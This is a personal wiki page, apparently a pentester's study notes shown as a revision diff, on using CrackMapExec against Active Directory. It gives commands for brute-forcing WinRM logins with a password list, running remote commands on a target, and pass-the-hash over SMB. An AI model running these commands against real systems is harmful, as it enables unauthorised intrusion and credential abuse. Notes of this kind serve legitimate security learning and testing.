The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » cme
cme

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision		Previous revision
cme [2024/02/04 01:53] – created gmancme [2024/02/04 02:08] (current) – [CME & WinRM] gman
Line 1: Line 1:
 ====== CrackMapExec (CME) ====== ====== CrackMapExec (CME) ======
  
-stuff...+**CrackMapExec:** "A swiss army knife for pentesting networks...
 +  * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.  
 +  * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. 
 +  * See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples. 
 + 
 +**Supported Protocols:** WinRM, MSSQL, SMB, SSH 
 + 
 +For help and syntax, just issue the command: ''crackmapexec'' or... 
 + 
 +<code> 
 +crackmapexec -h 
 +crackmapexec winrm -h # (for help specific to the winrm protocol) 
 +crackmapexec smb -h   # (for help specific to the smb protocol) 
 +</code> 
 + 
 +**General Syntax:** 
 + 
 +<code> 
 +crackmapexec <protocol> <target(s)> -u username -p password 
 +</code> 
 + 
 +**Examples:** 
 + 
 +<code> 
 +crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or... 
 +crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@' 
 +</code> 
 + 
 +===== CME & WinRM ===== 
 + 
 +**Syntax:** 
 + 
 +<code> 
 +crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt 
 +</code> 
 + 
 +You can use the ''-u'' switch to specify a file of possible user names to try. 
 +  * But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, "administrator," first). 
 +  * You should get a green "**[+]**" if successful. 
 + 
 +Look over the output (from the top down):  
 +  * First line: you can see it actually connects to WinRM. 
 +  * NOTE: wsman is an implementation of WinRM: windows management. 
 + 
 +**Execute Commands:** If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax: 
 + 
 +<code> 
 +crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami" 
 +crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo" 
 +</code> 
 + 
 +You should get some happy feedback along with the results of your command execution. 
 +  * ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system. 
 + 
 +===== CME & Pass-the-Hash ===== 
 + 
 +<code> 
 +crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" 
 +</code> 
 + 
 +This should indicated whether or not it works.  
 +  * If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system... 
 + 
 +<code> 
 +crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig" 
 +</code>  
 + 
 +It should give you visual feedback about the command execution. And there you go. Execute what you want. 
 + 
 + 
 + 
 + 
 +---- 
cme.1707011613.txt.gz · Last modified: by gman